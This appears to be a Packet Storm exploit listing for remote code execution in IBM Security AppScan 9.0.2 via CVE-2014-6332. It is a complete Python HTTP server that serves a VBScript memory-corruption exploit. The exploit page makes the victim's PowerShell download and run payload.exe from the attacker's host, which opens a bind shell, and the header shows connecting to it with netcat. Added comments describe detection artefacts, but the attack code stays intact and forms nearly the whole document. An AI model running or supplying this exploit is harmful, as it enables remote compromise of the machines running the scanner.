
IBM Security AppScan 9.0.2 Remote Code Execution

2015-06-01 00:00:00
Naser Farhadi
packetstormsecurity.com
52

0.974 High

EPSS

Percentile

99.9%

`#!/usr/bin/python  
  
import BaseHTTPServer, socket  
  
##  
# IBM Security AppScan Standard OLE Automation Array Remote Code Execution  
#  
# Author: Naser Farhadi  
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909  
#  
# Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7  
#  
# Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/   
# if you are able to exploit IE then you can exploit AppScan and Acunetix ;)  
# This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And  
# Metasploit windows/shell_bind_tcp Executable Payload  
#  
# Usage:  
# chmod +x appscan.py  
# ./appscan.py  
# ...  
# nc 172.20.10.14 333  
#  
# Video: http://youtu.be/hPs1zQaBLMU  
##  
  
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Two-route GET handler for the server started in ``__main__``.

    ``/payload.exe`` streams the file ``payload.exe`` from the server's working
    directory; every other path returns the HTML page (with embedded VBScript)
    written below.

    Defender's note: the observable artefacts on the wire and on the endpoint
    are a page served as ``text/html`` whose body starts with a
    ``<SCRIPT LANGUAGE="VBScript">`` element, a follow-up request for
    ``/payload.exe`` (``application/exe``), and a ``powershell`` child process
    started via ``Shell.Application`` with the ``runas`` verb (see ``runmumaa``
    in the served page). The header comment attributes the technique to
    MS14-064 / CVE-2014-6332; applying that patch is the mitigation it implies.
    Whether the scanner renders scanned content through the IE VBScript engine
    is stated in the header comment only, not shown by this code — confirm
    before relying on it.
    """

    # ``req`` is used in place of the conventional ``self``.
    def do_GET(req):
        # The 200 status line is emitted before the path is inspected, so
        # both routes answer 200 regardless of whether payload.exe exists.
        req.send_response(200)
        if req.path == "/payload.exe":
            # Whole file is read into memory and closed explicitly (no ``with``);
            # a missing payload.exe raises IOError after the headers were sent.
            req.send_header('Content-type', 'application/exe')
            req.end_headers()
            exe = open("payload.exe", 'rb')
            req.wfile.write(exe.read())
            exe.close()
        else:
            # Any other path serves the HTML page. The download URL inside it
            # is built at request time from the address this host's name
            # resolves to, so it matches the address the server binds to.
            req.send_header('Content-type', 'text/html')
            req.end_headers()
            req.wfile.write("""Please scan me!  
<SCRIPT LANGUAGE="VBScript">  
function runmumaa()   
On Error Resume Next  
set shell=createobject("Shell.Application")  
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\  
'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');"  
shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0  
end function  
  
dim aa()  
dim ab()  
dim a0  
dim a1  
dim a2  
dim a3  
dim win9x  
dim intVersion  
dim rnda  
dim funclass  
dim myarray  
  
Begin()  
  
function Begin()  
On Error Resume Next  
info=Navigator.UserAgent  
  
if(instr(info,"Win64")>0) then  
exit function  
end if  
  
if (instr(info,"MSIE")>0) then   
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
else  
exit function   
  
end if  
  
win9x=0  
  
BeginInit()  
If Create()=True Then  
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)  
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)  
  
if(intVersion<4) then  
document.write("<br> IE")  
document.write(intVersion)  
runshellcode()   
else   
setnotsafemode()  
end if  
end if  
end function  
  
function BeginInit()  
Randomize()  
redim aa(5)  
redim ab(5)  
a0=13+17*rnd(6)  
a3=7+3*rnd(5)  
end function  
  
function Create()  
On Error Resume Next  
dim i  
Create=False  
For i = 0 To 400  
If Over()=True Then  
' document.write(i)   
Create=True  
Exit For  
End If   
Next  
end function  
  
sub testaa()  
end sub  
  
function mydata()  
On Error Resume Next  
i=testaa  
i=null  
redim Preserve aa(a2)   
  
ab(0)=0  
aa(a1)=i  
ab(0)=6.36598737437801E-314  
  
aa(a1+2)=myarray  
ab(2)=1.74088534731324E-310   
mydata=aa(a1)  
redim Preserve aa(a0)   
end function   
  
  
function setnotsafemode()  
On Error Resume Next  
i=mydata()   
i=readmemo(i+8)  
i=readmemo(i+16)  
j=readmemo(i+&h134)   
for k=0 to &h60 step 4  
j=readmemo(i+&h120+k)  
if(j=14) then  
j=0   
redim Preserve aa(a2)   
aa(a1+2)(i+&h11c+k)=ab(4)  
redim Preserve aa(a0)   
  
j=0   
j=readmemo(i+&h120+k)   
  
Exit for  
end if  
  
next   
ab(2)=1.69759663316747E-313  
runmumaa()   
end function  
  
function Over()  
On Error Resume Next  
dim type1,type2,type3  
Over=False  
a0=a0+a3  
a1=a0+2  
a2=a0+&h8000000  
  
redim Preserve aa(a0)   
redim ab(a0)   
  
redim Preserve aa(a2)  
  
type1=1  
ab(0)=1.123456789012345678901234567890  
aa(a0)=10  
  
If(IsObject(aa(a1-1)) = False) Then  
if(intVersion<4) then  
mem=cint(a0+1)*16   
j=vartype(aa(a1-1))  
if((j=mem+4) or (j*8=mem+8)) then  
if(vartype(aa(a1-1))<>0) Then   
If(IsObject(aa(a1)) = False ) Then   
type1=VarType(aa(a1))  
end if   
end if  
else  
redim Preserve aa(a0)  
exit function  
  
end if   
else  
if(vartype(aa(a1-1))<>0) Then   
If(IsObject(aa(a1)) = False ) Then  
type1=VarType(aa(a1))  
end if   
end if  
end if  
end if  
  
  
If(type1=&h2f66) Then   
Over=True   
End If   
If(type1=&hB9AD) Then  
Over=True  
win9x=1  
End If   
  
redim Preserve aa(a0)   
  
end function  
  
function ReadMemo(add)   
On Error Resume Next  
redim Preserve aa(a2)   
  
ab(0)=0   
aa(a1)=add+4   
ab(0)=1.69759663316747E-313   
ReadMemo=lenb(aa(a1))   
  
ab(0)=0   
  
redim Preserve aa(a0)  
end function  
  
</script>""")  
  
if __name__ == '__main__':
    # Bind to the address this host's name resolves to, on port 80; binding a
    # port below 1024 normally requires elevated privileges on Unix-like systems.
    # Python 2 code: ``print`` statement and the ``BaseHTTPServer`` module.
    sclass = BaseHTTPServer.HTTPServer
    server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
    print "Http server started", socket.gethostbyname(socket.gethostname()), 80
    try:
        # Blocks until Ctrl-C; KeyboardInterrupt is the only exit path handled,
        # after which the listening socket is closed.
        server.serve_forever()
    except KeyboardInterrupt:
        pass
    server.server_close()
  
  
`